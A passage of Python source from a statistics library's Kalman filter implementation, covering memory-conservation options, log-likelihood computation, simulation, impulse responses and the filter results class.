Do not store the forecast, forecast error, or forecast error
covariance matrices. If this option is used, the `predict` method
from the results class is unavailable.
MEMORY_NO_PREDICTED_MEAN
Do not store the predicted state.
MEMORY_NO_PREDICTED_COV
Do not store the predicted state covariance
matrices.
MEMORY_NO_PREDICTED
Do not store the predicted state or predicted state covariance
matrices.
MEMORY_NO_FILTERED_MEAN
Do not store the filtered state.
MEMORY_NO_FILTERED_COV
Do not store the filtered state covariance
matrices.
MEMORY_NO_FILTERED
Do not store the filtered state or filtered state covariance
matrices.
MEMORY_NO_LIKELIHOOD
Do not store the vector of loglikelihood values for each
observation. Only the sum of the loglikelihood values is stored.
MEMORY_NO_GAIN
Do not store the Kalman gain matrices.
MEMORY_NO_SMOOTHING
Do not store temporary variables related to Kalman smoothing. If
this option is used, smoothing is unavailable.
MEMORY_NO_STD_FORECAST
Do not store standardized forecast errors.
MEMORY_CONSERVE
Do not store any intermediate matrices.
If the bitmask is set directly via the `conserve_memory` argument,
then the full method must be provided.
If keyword arguments are used to set individual boolean flags, then
the lowercase of the method must be used as an argument name, and the
value is the desired value of the boolean flag (True or False).
Note that the memory conservation method may also be specified by
directly modifying the class attributes which are defined similarly to
the keyword arguments.
The default memory conservation method is `MEMORY_STORE_ALL`, so that
all intermediate matrices are stored.
Examples
--------
>>> mod = sm.tsa.statespace.SARIMAX(range(10))
>>> mod.ssm..conserve_memory
0
>>> mod.ssm.memory_no_predicted
False
>>> mod.ssm.memory_no_predicted = True
>>> mod.ssm.conserve_memory
2
>>> mod.ssm.set_conserve_memory(memory_no_filtered=True,
... memory_no_forecast=True)
>>> mod.ssm.conserve_memory
7
"""
if conserve_memory is not None:
self.conserve_memory = conserve_memory
for name in KalmanFilter.memory_options:
if name in kwargs:
setattr(self, name, kwargs[name])
def set_filter_timing(self, alternate_timing=None, **kwargs):
r"""
Set the filter timing convention
By default, the Kalman filter follows Durbin and Koopman, 2012, in
initializing the filter with predicted values. Kim and Nelson, 1999,
instead initialize the filter with filtered values, which is
essentially just a different timing convention.
Parameters
----------
alternate_timing : int, optional
Whether or not to use the alternate timing convention. Default is
unspecified.
**kwargs
Keyword arguments may be used to influence the memory conservation
method by setting individual boolean flags. See notes for details.
"""
if alternate_timing is not None:
self.filter_timing = int(alternate_timing)
if 'timing_init_predicted' in kwargs:
self.filter_timing = int(not kwargs['timing_init_predicted'])
if 'timing_init_filtered' in kwargs:
self.filter_timing = int(kwargs['timing_init_filtered'])
@contextlib.contextmanager
def fixed_scale(self, scale):
"""
fixed_scale(scale)
Context manager for fixing the scale when FILTER_CONCENTRATED is set
Parameters
----------
scale : numeric
Scale of the model.
Notes
-----
This a no-op if scale is None.
This context manager is most useful in models which are explicitly
concentrating out the scale, so that the set of parameters they are
estimating does not include the scale.
"""
# If a scale was provided, use it and do not concentrate it out of the
# loglikelihood
if scale is not None and scale != 1:
if not self.filter_concentrated:
raise ValueError('Cannot provide scale if filter method does'
' not include FILTER_CONCENTRATED.')
self.filter_concentrated = False
self._scale = scale
obs_cov = self['obs_cov']
state_cov = self['state_cov']
self['obs_cov'] = scale * obs_cov
self['state_cov'] = scale * state_cov
try:
yield
finally:
# If a scale was provided, reset the model
if scale is not None and scale != 1:
self['state_cov'] = state_cov
self['obs_cov'] = obs_cov
self.filter_concentrated = True
self._scale = None
def _filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None,
filter_timing=None, tolerance=None, loglikelihood_burn=None,
complex_step=False):
# Initialize the filter
prefix, dtype, create_filter, create_statespace = (
self._initialize_filter(
filter_method, inversion_method, stability_method,
conserve_memory, filter_timing, tolerance, loglikelihood_burn
)
)
kfilter = self._kalman_filters[prefix]
# Initialize the state
self._initialize_state(prefix=prefix, complex_step=complex_step)
# Run the filter
kfilter()
return kfilter
def filter(self, filter_method=None, inversion_method=None,
stability_method=None, conserve_memory=None, filter_timing=None,
tolerance=None, loglikelihood_burn=None, complex_step=False):
r"""
Apply the Kalman filter to the statespace model.
Parameters
----------
filter_method : int, optional
Determines which Kalman filter to use. Default is conventional.
inversion_method : int, optional
Determines which inversion technique to use. Default is by Cholesky
decomposition.
stability_method : int, optional
Determines which numerical stability techniques to use. Default is
to enforce symmetry of the predicted state covariance matrix.
conserve_memory : int, optional
Determines what output from the filter to store. Default is to
store everything.
filter_timing : int, optional
Determines the timing convention of the filter. Default is that
from Durbin and Koopman (2012), in which the filter is initialized
with predicted values.
tolerance : float, optional
The tolerance at which the Kalman filter determines convergence to
steady-state. Default is 1e-19.
loglikelihood_burn : int, optional
The number of initial periods during which the loglikelihood is not
recorded. Default is 0.
Notes
-----
This function by default does not compute variables required for
smoothing.
"""
# Handle memory conservation
if conserve_memory is None:
conserve_memory = self.conserve_memory | MEMORY_NO_SMOOTHING
conserve_memory_cache = self.conserve_memory
self.set_conserve_memory(conserve_memory)
# Run the filter
kfilter = self._filter(
filter_method, inversion_method, stability_method, conserve_memory,
filter_timing, tolerance, loglikelihood_burn, complex_step)
# Create the results object
results = self.results_class(self)
results.update_representation(self)
results.update_filter(kfilter)
# Resent memory conservation
self.set_conserve_memory(conserve_memory_cache)
return results
def loglike(self, **kwargs):
r"""
Calculate the loglikelihood associated with the statespace model.
Parameters
----------
**kwargs
Additional keyword arguments to pass to the Kalman filter. See
`KalmanFilter.filter` for more details.
Returns
-------
loglike : float
The joint loglikelihood.
"""
kwargs.setdefault('conserve_memory',
MEMORY_CONSERVE ^ MEMORY_NO_LIKELIHOOD)
kfilter = self._filter(**kwargs)
loglikelihood_burn = kwargs.get('loglikelihood_burn',
self.loglikelihood_burn)
if not (kwargs['conserve_memory'] & MEMORY_NO_LIKELIHOOD):
loglike = np.sum(kfilter.loglikelihood[loglikelihood_burn:])
else:
loglike = np.sum(kfilter.loglikelihood)
# Need to modify the computed log-likelihood to incorporate the
# MLE scale.
if self.filter_method & FILTER_CONCENTRATED:
d = max(loglikelihood_burn, kfilter.nobs_diffuse)
nobs_k_endog = np.sum(
self.k_endog -
np.array(self._statespace.nmissing)[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kfilter.nobs_kendog_univariate_singular
if not (kwargs['conserve_memory'] & MEMORY_NO_LIKELIHOOD):
scale = np.sum(kfilter.scale[d:]) / nobs_k_endog
else:
scale = kfilter.scale[0] / nobs_k_endog
loglike += -0.5 * nobs_k_endog
# Now need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value part if
# the diffuse forecast error covariance matrix element was singular
if kfilter.nobs_diffuse > 0:
nobs_k_endog -= kfilter.nobs_kendog_diffuse_nonsingular
loglike += -0.5 * nobs_k_endog * np.log(scale)
return loglike
def loglikeobs(self, **kwargs):
r"""
Calculate the loglikelihood for each observation associated with the
statespace model.
Parameters
----------
**kwargs
Additional keyword arguments to pass to the Kalman filter. See
`KalmanFilter.filter` for more details.
Notes
-----
If `loglikelihood_burn` is positive, then the entries in the returned
loglikelihood vector are set to be zero for those initial time periods.
Returns
-------
loglike : array of float
Array of loglikelihood values for each observation.
"""
if self.memory_no_likelihood:
raise RuntimeError('Cannot compute loglikelihood if'
' MEMORY_NO_LIKELIHOOD option is selected.')
if not self.filter_method & FILTER_CONCENTRATED:
kwargs.setdefault('conserve_memory',
MEMORY_CONSERVE ^ MEMORY_NO_LIKELIHOOD)
else:
kwargs.setdefault(
'conserve_memory',
MEMORY_CONSERVE ^ (MEMORY_NO_FORECAST | MEMORY_NO_LIKELIHOOD))
kfilter = self._filter(**kwargs)
llf_obs = np.array(kfilter.loglikelihood, copy=True)
loglikelihood_burn = kwargs.get('loglikelihood_burn',
self.loglikelihood_burn)
# If the scale was concentrated out of the log-likelihood function,
# then the llf_obs above is:
# -0.5 * k_endog * log 2 * pi - 0.5 * log |F_t|
# and we need to add in the effect of the scale:
# -0.5 * k_endog * log scale - 0.5 v' F_t^{-1} v / scale
# and note that v' F_t^{-1} is in the _kalman_filter.scale array
# Also note that we need to adjust the nobs and k_endog in both the
# denominator of the scale computation and in the llf_obs adjustment
# to take into account missing values.
if self.filter_method & FILTER_CONCENTRATED:
d = max(loglikelihood_burn, kfilter.nobs_diffuse)
nmissing = np.array(self._statespace.nmissing)
nobs_k_endog = np.sum(self.k_endog - nmissing[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kfilter.nobs_kendog_univariate_singular
scale = np.sum(kfilter.scale[d:]) / nobs_k_endog
# Need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value if the
# diffuse forecast error covariance matrix element was singular
nsingular = 0
if kfilter.nobs_diffuse > 0:
d = kfilter.nobs_diffuse
Finf = kfilter.forecast_error_diffuse_cov
singular = np.diagonal(Finf).real <= kfilter.tolerance_diffuse
nsingular = np.sum(~singular, axis=1)
scale_obs = np.array(kfilter.scale, copy=True)
llf_obs += -0.5 * (
(self.k_endog - nmissing - nsingular) * np.log(scale) +
scale_obs / scale)
# Set any burned observations to have zero likelihood
llf_obs[:loglikelihood_burn] = 0
return llf_obs
def simulate(self, nsimulations, measurement_shocks=None,
state_shocks=None, initial_state=None):
r"""
Simulate a new time series following the state space model
Parameters
----------
nsimulations : int
The number of observations to simulate. If the model is
time-invariant this can be any number. If the model is
time-varying, then this number must be less than or equal to the
number
measurement_shocks : array_like, optional
If specified, these are the shocks to the measurement equation,
:math:`\varepsilon_t`. If unspecified, these are automatically
generated using a pseudo-random number generator. If specified,
must be shaped `nsimulations` x `k_endog`, where `k_endog` is the
same as in the state space model.
state_shocks : array_like, optional
If specified, these are the shocks to the state equation,
:math:`\eta_t`. If unspecified, these are automatically
generated using a pseudo-random number generator. If specified,
must be shaped `nsimulations` x `k_posdef` where `k_posdef` is the
same as in the state space model.
initial_state : array_like, optional
If specified, this is the state vector at time zero, which should
be shaped (`k_states` x 1), where `k_states` is the same as in the
state space model. If unspecified, but the model has been
initialized, then that initialization is used. If unspecified and
the model has not been initialized, then a vector of zeros is used.
Note that this is not included in the returned `simulated_states`
array.
Returns
-------
simulated_obs : ndarray
An (nsimulations x k_endog) array of simulated observations.
simulated_states : ndarray
An (nsimulations x k_states) array of simulated states.
"""
time_invariant = self.time_invariant
# Check for valid number of simulations
if not time_invariant and nsimulations > self.nobs:
raise ValueError('In a time-varying model, cannot create more'
' simulations than there are observations.')
# Check / generate measurement shocks
if measurement_shocks is not None:
measurement_shocks = np.array(measurement_shocks)
if measurement_shocks.ndim == 0:
measurement_shocks = measurement_shocks[np.newaxis, np.newaxis]
elif measurement_shocks.ndim == 1:
measurement_shocks = measurement_shocks[:, np.newaxis]
required_shape = (nsimulations, self.k_endog)
try:
measurement_shocks = measurement_shocks.reshape(required_shape)
except ValueError:
raise ValueError('Provided measurement shocks are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_shape),
str(measurement_shocks.shape)))
elif self.shapes['obs_cov'][-1] == 1:
measurement_shocks = np.random.multivariate_normal(
mean=np.zeros(self.k_endog), cov=self['obs_cov'],
size=nsimulations)
# Check / generate state shocks
if state_shocks is not None:
state_shocks = np.array(state_shocks)
if state_shocks.ndim == 0:
state_shocks = state_shocks[np.newaxis, np.newaxis]
elif state_shocks.ndim == 1:
state_shocks = state_shocks[:, np.newaxis]
required_shape = (nsimulations, self.k_posdef)
try:
state_shocks = state_shocks.reshape(required_shape)
except ValueError:
raise ValueError('Provided state shocks are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_shape),
str(state_shocks.shape)))
elif self.shapes['state_cov'][-1] == 1:
state_shocks = np.random.multivariate_normal(
mean=np.zeros(self.k_posdef), cov=self['state_cov'],
size=nsimulations)
# Handle time-varying case
tvp = (self.shapes['obs_cov'][-1] > 1 or
self.shapes['state_cov'][-1] > 1)
if tvp and measurement_shocks is None:
measurement_shocks = np.zeros((nsimulations, self.k_endog))
for i in range(nsimulations):
measurement_shocks[i] = np.random.multivariate_normal(
mean=np.zeros(self.k_endog),
cov=self['obs_cov', ..., i])
if tvp and state_shocks is None:
state_shocks = np.zeros((nsimulations, self.k_posdef))
for i in range(nsimulations):
state_shocks[i] = np.random.multivariate_normal(
mean=np.zeros(self.k_posdef),
cov=self['state_cov', ..., i])
# Get the initial states
if initial_state is not None:
initial_state = np.array(initial_state)
if initial_state.ndim == 0:
initial_state = initial_state[np.newaxis]
elif (initial_state.ndim > 1 and
not initial_state.shape == (self.k_states, 1)):
raise ValueError('Invalid shape of provided initial state'
' vector. Required (%d, 1)' % self.k_states)
elif self.initialization is not None:
out = self.initialization(model=self)
initial_state = out[0] + np.random.multivariate_normal(
np.zeros_like(out[0]), out[2])
else:
# TODO: deprecate this, since we really should not be simulating
# unless we have an initialization.
initial_state = np.zeros(self.k_states)
return self._simulate(nsimulations, measurement_shocks, state_shocks,
initial_state)
def _simulate(self, nsimulations, measurement_shocks, state_shocks,
initial_state):
raise NotImplementedError('Simulation only available through'
' the simulation smoother.')
def impulse_responses(self, steps=10, impulse=0, orthogonalized=False,
cumulative=False, direct=False):
r"""
Impulse response function
Parameters
----------
steps : int, optional
The number of steps for which impulse responses are calculated.
Default is 10. Note that the initial impulse is not counted as a
step, so if `steps=1`, the output will have 2 entries.
impulse : int or array_like
If an integer, the state innovation to pulse; must be between 0
and `k_posdef-1` where `k_posdef` is the same as in the state
space model. Alternatively, a custom impulse vector may be
provided; must be a column vector with shape `(k_posdef, 1)`.
orthogonalized : bool, optional
Whether or not to perform impulse using orthogonalized innovations.
Note that this will also affect custum `impulse` vectors. Default
is False.
cumulative : bool, optional
Whether or not to return cumulative impulse responses. Default is
False.
Returns
-------
impulse_responses : ndarray
Responses for each endogenous variable due to the impulse
given by the `impulse` argument. A (steps + 1 x k_endog) array.
Notes
-----
Intercepts in the measurement and state equation are ignored when
calculating impulse responses.
TODO: add note about how for time-varying systems this is - perhaps
counter-intuitively - returning the impulse response within the given
model (i.e. starting at period 0 defined by the model) and it is *not*
doing impulse responses after the end of the model. To compute impulse
responses from arbitrary time points, it is necessary to clone a new
model with the appropriate system matrices.
"""
# We need to add an additional step, since the first simulated value
# will always be zeros (note that we take this value out at the end).
steps += 1
# For time-invariant models, add an additional `step`. This is the
# default for time-invariant models based on the expected behavior for
# ARIMA and VAR models: we want to record the initial impulse and also
# `steps` values of the responses afterwards.
if (self._design.shape[2] == 1 and self._transition.shape[2] == 1 and
self._selection.shape[2] == 1):
steps += 1
# Check for what kind of impulse we want
if type(impulse) == int:
if impulse >= self.k_posdef or impulse < 0:
raise ValueError('Invalid value for `impulse`. Must be the'
' index of one of the state innovations.')
# Create the (non-orthogonalized) impulse vector
idx = impulse
impulse = np.zeros(self.k_posdef)
impulse[idx] = 1
else:
impulse = np.array(impulse)
if impulse.ndim > 1:
impulse = np.squeeze(impulse)
if not impulse.shape == (self.k_posdef,):
raise ValueError('Invalid impulse vector. Must be shaped'
' (%d,)' % self.k_posdef)
# Orthogonalize the impulses, if requested, using Cholesky on the
# first state covariance matrix
if orthogonalized:
state_chol = np.linalg.cholesky(self.state_cov[:, :, 0])
impulse = np.dot(state_chol, impulse)
# If we have time-varying design, transition, or selection matrices,
# then we can't produce more IRFs than we have time points
time_invariant_irf = (
self._design.shape[2] == self._transition.shape[2] ==
self._selection.shape[2] == 1)
# Note: to generate impulse responses following the end of a
# time-varying model, one should `clone` the state space model with the
# new time-varying model, and then compute the IRFs using the cloned
# model
if not time_invariant_irf and steps > self.nobs:
raise ValueError('In a time-varying model, cannot create more'
' impulse responses than there are'
' observations')
# Impulse responses only depend on the design, transition, and
# selection matrices. We set the others to zeros because they must be
# set in the call to `clone`.
# Note: we don't even need selection after the first point, because
# the state shocks will be zeros in every period except the first.
sim_model = self.clone(
endog=np.zeros((steps, self.k_endog), dtype=self.dtype),
obs_intercept=np.zeros(self.k_endog),
design=self['design', :, :, :steps],
obs_cov=np.zeros((self.k_endog, self.k_endog)),
state_intercept=np.zeros(self.k_states),
transition=self['transition', :, :, :steps],
selection=self['selection', :, :, :steps],
state_cov=np.zeros((self.k_posdef, self.k_posdef)))
# Get the impulse response function via simulation of the state
# space model, but with other shocks set to zero
measurement_shocks = np.zeros((steps, self.k_endog))
state_shocks = np.zeros((steps, self.k_posdef))
state_shocks[0] = impulse
initial_state = np.zeros((self.k_states,))
irf, _ = sim_model.simulate(
steps, measurement_shocks=measurement_shocks,
state_shocks=state_shocks, initial_state=initial_state)
# Get the cumulative response if requested
if cumulative:
irf = np.cumsum(irf, axis=0)
# Here we ignore the first value, because it is always zeros (we added
# an additional `step` at the top to account for this).
return irf[1:]
class FilterResults(FrozenRepresentation):
"""
Results from applying the Kalman filter to a state space model.
Parameters
----------
model : Representation
A Statespace representation
Attributes
----------
nobs : int
Number of observations.
nobs_diffuse : int
Number of observations under the diffuse Kalman filter.
k_endog : int
The dimension of the observation series.
k_states : int
The dimension of the unobserved state process.
k_posdef : int
The dimension of a guaranteed positive definite
covariance matrix describing the shocks in the
measurement equation.
dtype : dtype
Datatype of representation matrices
prefix : str
BLAS prefix of representation matrices
shapes : dictionary of name,tuple
A dictionary recording the shapes of each of the
representation matrices as tuples.
endog : ndarray
The observation vector.
design : ndarray
The design matrix, :math:`Z`.
obs_intercept : ndarray
The intercept for the observation equation, :math:`d`.
obs_cov : ndarray
The covariance matrix for the observation equation :math:`H`.
transition : ndarray
The transition matrix, :math:`T`.
state_intercept : ndarray
The intercept for the transition equation, :math:`c`.
selection : ndarray
The selection matrix, :math:`R`.
state_cov : ndarray
The covariance matrix for the state equation :math:`Q`.
missing : array of bool
An array of the same size as `endog`, filled
with boolean values that are True if the
corresponding entry in `endog` is NaN and False
otherwise.
nmissing : array of int
An array of size `nobs`, where the ith entry
is the number (between 0 and `k_endog`) of NaNs in
the ith row of the `endog` array.
time_invariant : bool
Whether or not the representation matrices are time-invariant
initialization : str
Kalman filter initialization method.
initial_state : array_like
The state vector used to initialize the Kalamn filter.
initial_state_cov : array_like
The state covariance matrix used to initialize the Kalamn filter.
initial_diffuse_state_cov : array_like
Diffuse state covariance matrix used to initialize the Kalamn filter.
filter_method : int
Bitmask representing the Kalman filtering method
inversion_method : int
Bitmask representing the method used to
invert the forecast error covariance matrix.
stability_method : int
Bitmask representing the methods used to promote
numerical stability in the Kalman filter
recursions.
conserve_memory : int
Bitmask representing the selected memory conservation method.
filter_timing : int
Whether or not to use the alternate timing convention.
tolerance : float
The tolerance at which the Kalman filter
determines convergence to steady-state.
loglikelihood_burn : int
The number of initial periods during which
the loglikelihood is not recorded.
converged : bool
Whether or not the Kalman filter converged.
period_converged : int
The time period in which the Kalman filter converged.
filtered_state : ndarray
The filtered state vector at each time period.
filtered_state_cov : ndarray
The filtered state covariance matrix at each time period.
predicted_state : ndarray
The predicted state vector at each time period.
predicted_state_cov : ndarray
The predicted state covariance matrix at each time period.
forecast_error_diffuse_cov : ndarray
Diffuse forecast error covariance matrix at each time period.
predicted_diffuse_state_cov : ndarray
The predicted diffuse state covariance matrix at each time period.
kalman_gain : ndarray
The Kalman gain at each time period.
forecasts : ndarray
The one-step-ahead forecasts of observations at each time period.
forecasts_error : ndarray
The forecast errors at each time period.
forecasts_error_cov : ndarray
The forecast error covariance matrices at each time period.
llf_obs : ndarray
The loglikelihood values at each time period.
"""
_filter_attributes = [
'filter_method', 'inversion_method', 'stability_method',
'conserve_memory', 'filter_timing', 'tolerance', 'loglikelihood_burn',
'converged', 'period_converged', 'filtered_state',
'filtered_state_cov', 'predicted_state', 'predicted_state_cov',
'forecasts_error_diffuse_cov', 'predicted_diffuse_state_cov',
'tmp1', 'tmp2', 'tmp3', 'tmp4', 'forecasts',
'forecasts_error', 'forecasts_error_cov', 'llf', 'llf_obs',
'collapsed_forecasts', 'collapsed_forecasts_error',
'collapsed_forecasts_error_cov', 'scale'
]
_filter_options = (
KalmanFilter.filter_methods + KalmanFilter.stability_methods +
KalmanFilter.inversion_methods + KalmanFilter.memory_options
)
_attributes = FrozenRepresentation._model_attributes + _filter_attributes
def __init__(self, model):
super(FilterResults, self).__init__(model)
# Setup caches for uninitialized objects
self._kalman_gain = None
self._standardized_forecasts_error = None
def update_representation(self, model, only_options=False):
"""
Update the results to match a given model
Parameters
----------
model : Representation
The model object from which to take the updated values.
only_options : bool, optional
If set to true, only the filter options are updated, and the state
space representation is not updated. Default is False.
Notes
-----
This method is rarely required except for internal usage.
"""
if not only_options:
super(FilterResults, self).update_representation(model)
# Save the options as boolean variables
for name in self._filter_options:
setattr(self, name, getattr(model, name, None))
def update_filter(self, kalman_filter):
"""
Update the filter results
Parameters
----------
kalman_filter : statespace.kalman_filter.KalmanFilter
The model object from which to take the updated values.
Notes
-----
This method is rarely required except for internal usage.
"""
# State initialization
self.initial_state = np.array(
kalman_filter.model.initial_state, copy=True
)
self.initial_state_cov = np.array(
kalman_filter.model.initial_state_cov, copy=True
)
# Save Kalman filter parameters
self.filter_method = kalman_filter.filter_method
self.inversion_method = kalman_filter.inversion_method
self.stability_method = kalman_filter.stability_method
self.conserve_memory = kalman_filter.conserve_memory
self.filter_timing = kalman_filter.filter_timing
self.tolerance = kalman_filter.tolerance
self.loglikelihood_burn = kalman_filter.loglikelihood_burn
# Save Kalman filter output
self.converged = bool(kalman_filter.converged)
self.period_converged = kalman_filter.period_converged
self.filtered_state = np.array(kalman_filter.filtered_state, copy=True)
self.filtered_state_cov = np.array(
kalman_filter.filtered_state_cov, copy=True
)
self.predicted_state = np.array(
kalman_filter.predicted_state, copy=True
)
self.predicted_state_cov = np.array(
kalman_filter.predicted_state_cov, copy=True
)
# Reset caches
has_missing = np.sum(self.nmissing) > 0
if not (self.memory_no_std_forecast or self.invert_lu or
self.solve_lu or self.filter_collapsed):
if has_missing:
self._standardized_forecasts_error = np.array(
reorder_missing_vector(
kalman_filter.standardized_forecast_error,
self.missing, prefix=self.prefix))
else:
self._standardized_forecasts_error = np.array(
kalman_filter.standardized_forecast_error, copy=True)
else:
self._standardized_forecasts_error = None
# In the partially missing data case, all entries will
# be in the upper left submatrix rather than the correct placement
# Re-ordering does not make sense in the collapsed case.
if has_missing and (not self.memory_no_gain and
not self.filter_collapsed):
self._kalman_gain = np.array(reorder_missing_matrix(
kalman_filter.kalman_gain, self.missing, reorder_cols=True,
prefix=self.prefix))
self.tmp1 = np.array(reorder_missing_matrix(
kalman_filter.tmp1, self.missing, reorder_cols=True,
prefix=self.prefix))
self.tmp2 = np.array(reorder_missing_vector(
kalman_filter.tmp2, self.missing, prefix=self.prefix))
self.tmp3 = np.array(reorder_missing_matrix(
kalman_filter.tmp3, self.missing, reorder_rows=True,
prefix=self.prefix))
self.tmp4 = np.array(reorder_missing_matrix(
kalman_filter.tmp4, self.missing, reorder_cols=True,
reorder_rows=True, prefix=self.prefix))
else:
if not self.memory_no_gain:
self._kalman_gain = np.array(
kalman_filter.kalman_gain, copy=True)
self.tmp1 = np.array(kalman_filter.tmp1, copy=True)
self.tmp2 = np.array(kalman_filter.tmp2, copy=True)
self.tmp3 = np.array(kalman_filter.tmp3, copy=True)
self.tmp4 = np.array(kalman_filter.tmp4, copy=True)
self.M = np.array(kalman_filter.M, copy=True)
self.M_diffuse = np.array(kalman_filter.M_inf, copy=True)
# Note: use forecasts rather than forecast, so as not to interfer
# with the `forecast` methods in subclasses
self.forecasts = np.array(kalman_filter.forecast, copy=True)
self.forecasts_error = np.array(
kalman_filter.forecast_error, copy=True
)
self.forecasts_error_cov = np.array(
kalman_filter.forecast_error_cov, copy=True
)
# Note: below we will set self.llf, and in the memory_no_likelihood
# case we will replace self.llf_obs = None at that time.
self.llf_obs = np.array(kalman_filter.loglikelihood, copy=True)
# Diffuse objects
self.nobs_diffuse = kalman_filter.nobs_diffuse
self.initial_diffuse_state_cov = None
self.forecasts_error_diffuse_cov = None
self.predicted_diffuse_state_cov = None
if self.nobs_diffuse > 0:
self.initial_diffuse_state_cov = np.array(
kalman_filter.model.initial_diffuse_state_cov, copy=True)
self.predicted_diffuse_state_cov = np.array(
kalman_filter.predicted_diffuse_state_cov, copy=True)
if has_missing and not self.filter_collapsed:
self.forecasts_error_diffuse_cov = np.array(
reorder_missing_matrix(
kalman_filter.forecast_error_diffuse_cov,
self.missing, reorder_cols=True, reorder_rows=True,
prefix=self.prefix))
else:
self.forecasts_error_diffuse_cov = np.array(
kalman_filter.forecast_error_diffuse_cov, copy=True)
# If there was missing data, save the original values from the Kalman
# filter output, since below will set the values corresponding to
# the missing observations to nans.
self.missing_forecasts = None
self.missing_forecasts_error = None
self.missing_forecasts_error_cov = None
if np.sum(self.nmissing) > 0:
# Copy the provided arrays (which are as the Kalman filter dataset)
# into new variables
self.missing_forecasts = np.copy(self.forecasts)
self.missing_forecasts_error = np.copy(self.forecasts_error)
self.missing_forecasts_error_cov = (
np.copy(self.forecasts_error_cov)
)
# Save the collapsed values
self.collapsed_forecasts = None
self.collapsed_forecasts_error = None
self.collapsed_forecasts_error_cov = None
if self.filter_collapsed:
# Copy the provided arrays (which are from the collapsed dataset)
# into new variables
self.collapsed_forecasts = self.forecasts[:self.k_states, :]
self.collapsed_forecasts_error = (
self.forecasts_error[:self.k_states, :]
)
self.collapsed_forecasts_error_cov = (
self.forecasts_error_cov[:self.k_states, :self.k_states, :]
)
# Recreate the original arrays (which should be from the original
# dataset) in the appropriate dimension
dtype = self.collapsed_forecasts.dtype
self.forecasts = np.zeros((self.k_endog, self.nobs), dtype=dtype)
self.forecasts_error = np.zeros((self.k_endog, self.nobs),
dtype=dtype)
self.forecasts_error_cov = (
np.zeros((self.k_endog, self.k_endog, self.nobs), dtype=dtype)
)
# Fill in missing values in the forecast, forecast error, and
# forecast error covariance matrix (this is required due to how the
# Kalman filter implements observations that are either partly or
# completely missing)
# Construct the predictions, forecasts
can_compute_mean = not (self.memory_no_forecast_mean or
self.memory_no_predicted_mean)
can_compute_cov = not (self.memory_no_forecast_cov or
self.memory_no_predicted_cov)
if can_compute_mean or can_compute_cov:
for t in range(self.nobs):
design_t = 0 if self.design.shape[2] == 1 else t
obs_cov_t = 0 if self.obs_cov.shape[2] == 1 else t
obs_intercept_t = 0 if self.obs_intercept.shape[1] == 1 else t
# For completely missing observations, the Kalman filter will
# produce forecasts, but forecast errors and the forecast
# error covariance matrix will be zeros - make them nan to
# improve clarity of results.
if self.nmissing[t] > 0:
mask = ~self.missing[:, t].astype(bool)
# We can recover forecasts
# For partially missing observations, the Kalman filter
# will produce all elements (forecasts, forecast errors,
# forecast error covariance matrices) as usual, but their
# dimension will only be equal to the number of non-missing
# elements, and their location in memory will be in the
# first blocks (e.g. for the forecasts_error, the first
# k_endog - nmissing[t] columns will be filled in),
# regardless of which endogenous variables they refer to
# (i.e. the non- missing endogenous variables for that
# observation). Furthermore, the forecast error covariance
# matrix is only valid for those elements. What is done is
# to set all elements to nan for these observations so that
# they are flagged as missing. The variables
# missing_forecasts, etc. then provide the forecasts, etc.
# provided by the Kalman filter, from which the data can be
# retrieved if desired.
if can_compute_mean:
self.forecasts[:, t] = np.dot(
self.design[:, :, design_t],
self.predicted_state[:, t]
) + self.obs_intercept[:, obs_intercept_t]
self.forecasts_error[:, t] = np.nan
self.forecasts_error[mask, t] = (
self.endog[mask, t] - self.forecasts[mask, t])
# TODO: We should only fill in the non-masked elements of
# this array. Also, this will give the multivariate version
# even if univariate filtering was selected. Instead, we
# should use the reordering methods and then replace the
# masked values with NaNs
if can_compute_cov:
self.forecasts_error_cov[:, :, t] = np.dot(
np.dot(self.design[:, :, design_t],
self.predicted_state_cov[:, :, t]),
self.design[:, :, design_t].T
) + self.obs_cov[:, :, obs_cov_t]
# In the collapsed case, everything just needs to be rebuilt
# for the original observed data, since the Kalman filter
# produced these values for the collapsed data.
elif self.filter_collapsed:
if can_compute_mean:
self.forecasts[:, t] = np.dot(
self.design[:, :, design_t],
self.predicted_state[:, t]
) + self.obs_intercept[:, obs_intercept_t]
self.forecasts_error[:, t] = (
self.endog[:, t] - self.forecasts[:, t]
)
if can_compute_cov:
self.forecasts_error_cov[:, :, t] = np.dot(
np.dot(self.design[:, :, design_t],
self.predicted_state_cov[:, :, t]),
self.design[:, :, design_t].T
) + self.obs_cov[:, :, obs_cov_t]
# Note: if we concentrated out the scale, need to adjust the
# loglikelihood values and all of the covariance matrices and the
# values that depend on the covariance matrices
# Note: concentrated computation is not permitted with collapsed
# version, so we do not need to modify collapsed arrays.
self.scale = 1.
if self.filter_concentrated and self.model._scale is None:
d = max(self.loglikelihood_burn, self.nobs_diffuse)
# Compute the scale
nmissing = np.array(kalman_filter.model.nmissing)
nobs_k_endog = np.sum(self.k_endog - nmissing[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kalman_filter.nobs_kendog_univariate_singular
scale_obs = np.array(kalman_filter.scale, copy=True)
if not self.memory_no_likelihood:
self.scale = np.sum(scale_obs[d:]) / nobs_k_endog
else:
self.scale = scale_obs[0] / nobs_k_endog
# Need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value if the
# diffuse forecast error covariance matrix element was singular
nsingular = 0
if kalman_filter.nobs_diffuse > 0:
Finf = kalman_filter.forecast_error_diffuse_cov
singular = (np.diagonal(Finf).real <=
kalman_filter.tolerance_diffuse)
nsingular = np.sum(~singular, axis=1)
# Adjust the loglikelihood obs (see `KalmanFilter.loglikeobs` for
# defaults on the adjustment)
if not self.memory_no_likelihood:
self.llf_obs += -0.5 * (
(self.k_endog - nmissing - nsingular) * np.log(self.scale)
+ scale_obs / self.scale)
else:
self.llf_obs[0] += -0.5 * (np.sum(
(self.k_endog - nmissing - nsingular) * np.log(self.scale))
+ scale_obs / self.scale)
# Scale the filter output
self.obs_cov = self.obs_cov * self.scale
self.state_cov = self.state_cov * self.scale
self.initial_state_cov = self.initial_state_cov * self.scale
